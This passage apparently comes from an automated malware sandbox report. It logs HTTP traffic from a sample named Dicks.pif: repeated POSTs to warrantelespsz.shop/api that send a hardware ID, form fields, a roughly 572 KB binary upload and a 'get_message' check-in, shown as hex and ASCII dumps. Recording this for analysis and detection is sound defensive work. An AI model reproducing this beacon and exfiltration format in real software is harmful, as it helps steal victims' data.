                                            2024-07-25 07:54:09 UTC15100OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
                                            2024-07-25 07:54:09 UTC810INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 07:54:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=37971a3r5ja02c9ia97tsm7j8t; expires=Mon, 18-Nov-2024 01:40:48 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k1JaW32aMgnLsjVmlVGLtxFCMJDqiwMB%2BlHlOZ53NeWLqmo9jlFJ3v%2FoJ%2Ff58xZxC0KpDNy%2FEi6ipG%2BS5PeCsu%2FZczbZ9idgcTn%2Bab8SvHEvDSFHR3xBn3OQ%2BUFW6QL6WBK4s0C7"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8a94918b74430e-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 07:54:09 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                            Data Ascii: eok 8.46.123.33
                                            2024-07-25 07:54:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.649726188.114.96.34433248C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 07:54:10 UTC285OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 19958
                                            Host: warrantelespsz.shop
                                            2024-07-25 07:54:10 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
                                            2024-07-25 07:54:10 UTC4627OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5
                                            Data Ascii: +?2+?2+?o?Mp5p_
                                            2024-07-25 07:54:11 UTC798INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 07:54:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=nubgmc2544koh8v7rkmagder23; expires=Mon, 18-Nov-2024 01:40:50 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xCVg9o1F%2FPoi26G93E8jaNuFC0CAMymdi5EHF1iRtbqTmOjlVFA2gEm0qcI0O%2BgxFPJocPZCgmIvr1ocKwblpdLWc12rkzEszu11xQzMBBhGVwpLpaxy1c5OQO0k5kTqQqbPQR44"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8a94993f944303-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 07:54:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                            Data Ascii: eok 8.46.123.33
                                            2024-07-25 07:54:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.649727188.114.96.34433248C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 07:54:12 UTC284OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 1242
                                            Host: warrantelespsz.shop
                                            2024-07-25 07:54:12 UTC1242OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
                                            2024-07-25 07:54:12 UTC798INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 07:54:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=pu5hcop3hld2ckj6clema448g0; expires=Mon, 18-Nov-2024 01:40:51 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w674Iy4XoFl2mBXET2Tc3%2B1YDOCIPqFcJ6sRoiNCGvZ3x2%2FpQCaRBRF7VtxiAORp5v9LQgst5RveGpgTspNIpELZvrD4W2pc2fVV3z8Pkp52DWES3hxg7ys8yp3dRJXCgpZMzgK4"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8a94a49e9d41ec-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 07:54:12 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                            Data Ascii: eok 8.46.123.33
                                            2024-07-25 07:54:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.649728188.114.96.34433248C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 07:54:13 UTC286OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 572261
                                            Host: warrantelespsz.shop
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: b9 6c 76 42 b7 6b a3 f7 33 c3 05 8e 9a ea 08 cb 73 e3 a5 01 ce 9b a5 ff dd 57 f0 ff 7d c9 00 f4 8a 6e 30 8b 03 89 16 d4 62 2e 60 d7 fe 5a ce 64 da 64 8e c6 fa a6 b0 4b 28 7e db 50 bc 9d 94 90 83 71 f0 56 9c b9 73 cf af a6 27 37 20 02 2e a6 65 3b 7b e2 40 9b 32 ef 0f 0b 74 fc b6 3c e7 6a 48 49 03 a6 6e 13 54 ea d0 02 36 df 66 46 26 bd 33 67 8b f5 c9 d1 5d 78 50 dc 68 44 ca 93 c5 29 0d fe 77 dd 64 6a 9d 95 a2 f6 30 ac c0 aa 04 76 1e fc 1f 95 55 98 f2 b3 98 39 0a 12 13 04 b9 2b 73 9b 5d c4 79 a4 15 e5 06 ee 62 8e 6f a8 a6 30 99 44 43 bc 8e f0 86 dc ca a7 10 d8 78 5b e9 83 48 53 2c ec ff 13 5a db 8a 53 35 bb 63 1d 56 a9 ec 00 91 27 9a 1b 3b d3 3a f9 13 e6 57 eb ea ec 63 82 2e b4 a7 47 5b 45 46 7c c1 1d df 4d 43 a5 56 9e e9 ec cc df a9 54 b6 0e eb 7c cf 67 db
                                            Data Ascii: lvBk3sW}n0b.`ZddK(~PqVs'7 .e;{@2t<jHInT6fF&3g]xPhD)wdj0vU9+s]ybo0DCx[HS,ZS5cV';:Wc.G[EF|MCVT|g
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 53 65 58 d6 09 96 0f 43 98 45 5a cd 9a 57 99 75 ee e3 e6 a2 4f 47 6f 67 fc 7a 5c cd a2 42 db ef 32 3b 8b ff 1a ec 36 16 80 b5 8a 1d 31 a2 4c a7 3c 34 92 ef 5b 45 35 9b 52 ef 73 65 2f 32 24 36 87 35 03 70 97 cc d9 c1 82 64 21 7e 28 09 bc fc 1e fd 44 b5 cc 90 9e bb a3 c5 78 63 fb 51 d5 a4 39 44 de 55 5b e7 b0 b2 3b b1 8f b7 21 c1 76 15 d8 31 c4 25 a5 ec 54 f5 e7 97 b1 a3 91 4c f5 d2 a1 74 31 b3 56 86 3c 34 69 d4 48 6e d1 6b a2 24 2d eb ff 05 96 c2 31 49 0a 6a 93 22 54 02 fb c6 c7 03 c7 6e 0e e0 ed 73 92 c0 52 66 28 69 e6 89 30 69 6a 7a 75 e2 0d a5 96 5f b1 37 bd b4 47 7f 63 fa 38 15 89 2d 84 2d 2a e4 ab 27 65 9c 1c ec 57 2d a6 1e 76 09 9a c3 91 26 83 6a 90 23 9d e5 58 eb f0 33 bc 8c 75 83 78 d0 e4 87 3a 0f 0f ee 33 24 a3 8f aa 1d ed 02 3b 30 8f 3d ed de 53
                                            Data Ascii: SeXCEZWuOGogz\B2;61L<4[E5Rse/2$65pd!~(DxcQ9DU[;!v1%TLt1V<4iHnk$-1Ij"TnsRf(i0ijzu_7Gc8--*'eW-v&j#X3ux:3$;0=S
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 55 ac 4c 17 19 ff 3a f4 ae bf 5c 2c df e2 1e c1 f8 0c cc 7c 4c 0b 9b d6 68 61 fc 6d b0 33 b3 be e3 27 c6 e8 0a 71 4b 97 81 c5 e4 6b 2b 38 df fd ae 29 d1 a1 71 66 ac e2 61 45 da 23 7d f1 bf c9 75 ad d5 55 45 36 9c bc bf e5 04 d3 5f e6 9a 8f 7c ef 9e 6a ff 37 3c 50 87 a8 7a 4c ea c3 1c b8 7f 6c 7f ec e4 8a 36 9b 5a fd e5 54 da 42 70 e3 5a 6c d9 17 c3 eb e3 77 d6 8c a6 f8 8e d3 52 43 59 b9 57 ff 3a b1 e9 fd c9 50 81 16 e2 f8 f5 5b ec c6 d4 82 ac 15 be 70 66 a1 2a 21 fd 5c e8 7c 7f 98 c3 a7 fa ea bf dd e5 7e ca b5 5e 6c e5 54 8d 45 88 a4 06 fa 0f b2 d4 64 7c 96 27 d6 5e 7a 2f 9f 36 e1 03 ed 4b 9c 98 59 86 bd 23 56 a9 e2 80 a2 ea 30 ad fd d7 70 cf 7e 4e 27 87 15 aa e0 be fc 35 17 ed ff 54 83 77 45 4a e5 14 af 89 15 fe d7 88 d0 dd 23 83 79 2b c6 8a 5a db d4 a5
                                            Data Ascii: UL:\,|Lham3'qKk+8)qfaE#}uUE6_|j7<PzLl6ZTBpZlwRCYW:P[pf*!\|~^lTEd|'^z/6KY#V0p~N'5TwEJ#y+Z
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 17 b7 ab 06 83 04 e1 77 ab 51 45 ce 69 62 71 fa 8d 34 68 c1 0a 63 1c 84 18 eb c1 9e b8 42 63 3a 01 74 e1 0b e3 37 a7 15 0d 45 6f f5 a6 e4 47 d2 3b f2 0c 95 30 dc 5f 05 cf 37 91 9e d7 0e ca 9f e7 83 6a 08 e0 7c b3 d8 13 16 75 82 d9 97 53 90 b6 d5 23 bc fb d1 23 67 51 f7 b1 4f 1e 26 2b 40 89 d4 15 10 1a f5 52 36 0b 5f 84 0d ed de 65 c3 85 91 90 eb 56 67 b1 a4 07 f9 4a 76 84 e6 bf fd c8 56 03 45 4d 41 25 ab e8 5f 27 c9 f1 02 02 7f e6 58 29 d7 e6 72 d7 78 6b fd 95 35 2e 60 f7 db f4 81 08 a8 a0 d5 d4 15 5d 6a e3 df bb 7a ee c2 c2 c9 f3 7e 49 8b 36 c7 2a 7e b9 1f 7b c7 34 3f ef fc 88 4e 5e e0 f9 cf dc a7 63 5f 99 fb 32 9a 6e 94 0c f3 fd ff ce d9 75 49 50 fa 8b 07 a9 04 f3 20 33 06 96 9d 7f 29 c8 a8 2a a7 a5 b5 a2 4b 00 c2 73 e4 31 d1 77 07 69 27 40 c7 07 ce b6
                                            Data Ascii: wQEibq4hcBc:t7EoG;0_7j|uS##gQO&+@R6_eVgJvVEMA%_'X)rxk5.`]jz~I6*~{4?N^c_2nuIP 3)*Ks1wi'@
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 97 84 8d 9a c0 60 f2 96 13 cc 9c a0 91 a0 3a 93 13 0f 28 0d 56 05 c6 e1 1e f9 b0 92 e0 e2 fb 80 49 87 79 fc 91 17 22 0d 4e 51 bf 65 8f 10 3f 24 98 db 86 79 71 de b3 4b 8b e5 5a 1e 6c 9a 97 4f 1b 4d d2 4b fe 9d 15 47 99 bb 44 5e a0 de ec dc 75 d2 90 e1 f4 a1 f6 4e aa e2 32 43 37 93 5e 22 6a 74 25 64 f6 2b b9 2e a8 58 a7 f6 a7 88 9a 4a dc 07 7b 58 17 eb e7 05 3e 62 13 9d ce 63 32 4c f5 4a f0 2e 9a f8 b5 43 47 c3 1c 8f 24 0e 91 4e 8d cd 50 a6 b5 6a c5 ea 7c df e7 dc dd 3b 20 f1 f8 0d 55 6b 9b c8 1b 51 84 d9 9b af 6b 35 10 7e 04 40 2a 63 7e 58 27 9f 41 e9 61 1b e7 9f 28 03 7a 99 39 97 8a 7c 65 14 a1 f0 68 e2 74 d4 e6 ed 00 0d b5 66 e4 36 f6 e6 47 89 8f f4 95 9a 24 25 7e 70 58 57 bd d0 92 85 84 3d 30 70 3c 16 b2 5c a2 d8 13 51 1f 45 33 eb c1 42 30 7b 94 b6 84
                                            Data Ascii: `:(VIy"NQe?$yqKZlOMKGD^uN2C7^"jt%d+.XJ{X>bc2LJ.CG$NPj|; UkQk5~@*c~X'Aa(z9|ehtf6G$%~pXW=0p<\QE3B0{
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 83 c8 0c 7a 98 8f 1f 49 45 8d ab 05 41 84 78 95 4a b4 49 da 61 f0 70 de 29 60 eb 6d e3 0c 79 7a f2 c7 e1 35 85 97 b3 91 cb 5a e4 84 21 f4 46 4e a0 dc 60 a5 0e 14 f6 84 4b 42 49 af 69 a3 70 f7 ce 69 3f e5 ae 60 90 4b 78 02 17 fc f7 89 03 e1 7d 24 c6 50 4c b4 cc 32 51 65 8c fb 3a 14 15 1a 7e 94 11 ca d5 22 0c 33 c4 16 19 d6 47 5d af 1b 59 39 61 b6 a2 16 b0 3f cf d1 a7 58 16 09 4e 2f 03 3d cc 54 b2 67 2b 77 78 d6 fa 93 2a 57 24 a6 d4 6a cb d0 71 22 ae 0d a5 5b a2 50 9d f8 23 4a 91 60 58 b3 16 17 31 8e 1c bb c6 df d0 e3 63 7f 05 6f 60 e5 3c 64 e1 84 d8 18 16 ff c8 f0 23 27 e1 10 86 58 8b d9 c4 9e 7b 6b f6 8a e1 c1 47 f6 2c de 90 9b c8 f3 6c 22 97 6c 5f 86 5e 34 19 a9 2e 70 4c cc 8c ba 22 5d 56 07 24 fa 82 37 d1 08 ee d2 8a 4d f9 d0 5b 55 2e 7e 7a 2f 8a 92 40
                                            Data Ascii: zIEAxJIap)`myz5Z!FN`KBIipi?`Kx}$PL2Qe:~"3G]Y9a?XN/=Tg+wx*W$jq"[P#J`X1co`<d#'X{kG,l"l_^4.pL"]V$7M[U.~z/@
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 9a 20 ef cb 86 05 07 3c e6 b8 31 7d 0d f7 48 3e 65 f0 a8 c1 b9 9c d8 f4 73 c3 ac db 6f 91 ce 32 85 c7 1a 0a 21 c1 f2 a8 95 fb db c9 c9 51 e5 21 fd c4 a2 2f b5 af 59 d6 53 37 9b 52 dc d4 f9 e9 f9 91 57 c2 52 0e c6 f4 2d 1b b7 2c 7e 41 fe 1d a4 3b 36 ab 47 0f 62 89 0e 62 c2 28 32 cc b8 31 97 a6 5e 2e f2 5d c7 8d f8 f6 36 8f 09 d0 35 aa b9 be 07 88 6d 40 27 16 ee fc 6d b6 cc 18 38 2f 7a 7d 73 95 61 b9 ac a8 27 6a 67 97 4d cc 12 01 2b aa 44 2f af 31 89 1f 95 75 ed 81 b3 10 5c f5 38 c9 92 ac de 23 70 7f 04 1a fb 8d 80 6d f4 6b d9 c6 8c 3d 40 30 cb b4 1b 11 9f 2e ce 73 92 2c 39 25 8f 7f 16 a9 69 88 5f d0 87 eb 97 f8 c0 97 c8 82 8a 3b 70 a8 f0 11 5a 82 2a b0 9b f9 3b fe 8c dd 91 83 ef fc 0f 71 96 5f 1f 3f 6e 9b 3d 76 f2 61 a4 79 28 cd 16 22 4f d4 25 3f 78 ad 06
                                            Data Ascii: <1}H>eso2!Q!/YS7RWR-,~A;6Gbb(21^.]65m@'m8/z}sa'jgM+D/1u\8#pmk=@0.s,9%i_;pZ*;q_?n=vay("O%?x
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 42 84 b1 c7 16 72 97 94 31 a0 78 ce 10 22 d0 d3 b5 98 e6 14 14 62 f3 e7 24 70 de 93 e2 56 e3 83 be 6a e6 b4 18 ad 26 e4 1a 00 a2 9f 50 cd 9c 98 f1 de a0 5e 91 36 bd 59 1f 44 a4 11 69 7a 4a 5b 34 7e 77 92 24 ef 4d 1f 0d 0d 94 7f e5 5e 88 c8 ae 7e 10 2e 95 c3 42 f2 35 71 cc 15 1d eb c5 10 ef a7 cb c6 78 27 47 e8 c3 7c af 16 f2 3d 07 38 3d 45 70 a8 0f 4a cf 9f d0 69 e5 79 78 25 2c f3 f4 1e 36 10 08 e6 e2 78 37 6b 6a 15 81 e4 11 2a 95 cd 4c af 40 cc df 5f 85 be 89 c5 f5 87 fa 82 17 7d 73 67 3a 9a 5c d0 a1 3d bb c9 eb 8d c7 70 65 0c 57 85 c2 c6 90 7e 6c 9c ee 27 d9 d4 30 19 80 98 ae e5 3c dd 81 49 1e e5 63 ce a2 96 ea 83 c3 88 8d e1 b7 6d 77 5a 94 d9 11 a9 c3 03 6b 27 49 b7 42 05 b3 8d 4e 96 6b ea 28 97 eb 58 7a 09 72 6a 92 c7 2b ad b5 e6 72 04 ac 7a fe b5 00
                                            Data Ascii: Br1x"b$pVj&P^6YDizJ[4~w$M^~.B5qx'G|=8=EpJiyx%,6x7kj*L@_}sg:\=peW~l'0<IcmwZk'IBNk(Xzrj+rz
                                            2024-07-25 07:54:13 UTC15331OUTData Raw: 2a 39 66 ca ef 81 9f 19 88 f1 b1 18 80 63 d7 4f 62 90 da d8 23 ad 7c be 7a e5 8e 3e 2b dc 52 3d cc e0 00 10 9e 7f bb d5 5d 6b 54 5b 93 21 c1 d9 0e 5e 4c 09 14 22 d8 e4 ae d1 7b 46 f8 3d 67 1e 4f f8 16 71 f6 8a 59 72 eb 83 3b e4 e5 dd 8e b0 a6 40 59 77 9c 74 80 b5 c7 72 83 a0 7a 1b 8a ec 20 81 62 ba 8b c2 94 30 7f ec 26 7a 75 44 e3 53 78 de e8 cc c5 42 77 28 c3 d9 53 59 c2 13 a6 b9 ca cd 98 f7 44 7f 52 73 ab 8e 08 89 e1 ec 53 88 f5 8b 41 f2 64 8d 91 04 9f 0d bb c1 9a 67 02 a9 7f dc 07 e8 b1 a0 ee 4f 96 2a 83 f8 35 2e de 20 cc a0 8c 1d 20 d7 ca 92 3e e1 62 62 10 82 cb 4c f7 c3 4d 0e b2 d8 e3 cb a7 3e e1 20 c0 3f eb ed fe 59 3e 7b e3 f0 99 9b 2b 82 e0 cd 5e 9b be e8 6b a7 93 6d 04 98 09 e6 0c 03 dd 2d fc a6 08 ca a4 c4 36 41 dd fa ae 91 c4 d2 f6 e6 11 9d e7
                                            Data Ascii: *9fcOb#|z>+R=]kT[!^L"{F=gOqYr;@Ywtrz b0&zuDSxBw(SYDRsSAdgO*5. >bbLM> ?Y>{+^km-6A
                                            2024-07-25 07:54:15 UTC804INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 07:54:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=l65uo6g51d0u78oe5hm2o7vse4; expires=Mon, 18-Nov-2024 01:40:54 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94T5q0A04pVJJsVrUxT2J2PNYDXq7tBtVtxfUOCV3XBwZLSQm4W65ARGzUSmq%2FzFpr2l1JXjvjiMIslwwNa5k%2FoMll2WXfxmgjG5Bo00IvyC%2F2SW3wYHTHorUMzac7qB%2F%2FRqjksd"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8a94adde550cb4-EWR
                                            alt-svc: h3=":443"; ma=86400


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.649729188.114.96.34433248C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 07:54:17 UTC267OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 77
                                            Host: warrantelespsz.shop
                                            2024-07-25 07:54:17 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 6c 67 59 39 69 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33
                                            Data Ascii: act=get_message&ver=4.0&lid=DlgY9i--&j=&hwid=FEC0D93EF0D267C9B2AB9B40D5FD6253
                                            2024-07-25 07:54:18 UTC804INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 07:54:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=j9m04srtk1menth86s9icsj75b; expires=Mon, 18-Nov-2024 01:40:56 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
